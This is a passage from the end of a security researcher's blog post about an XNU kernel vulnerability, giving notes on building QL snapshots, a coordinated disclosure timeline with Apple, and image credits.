Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.410.13.510.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.

Timeline

  • 2018-08-09: Privately disclosed to product-security@apple.com. Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by product-security@apple.com.
  • 2018-08-20: product-security@apple.com asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to product-security@apple.com. Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: product-security@apple.com confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"

Credits

  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.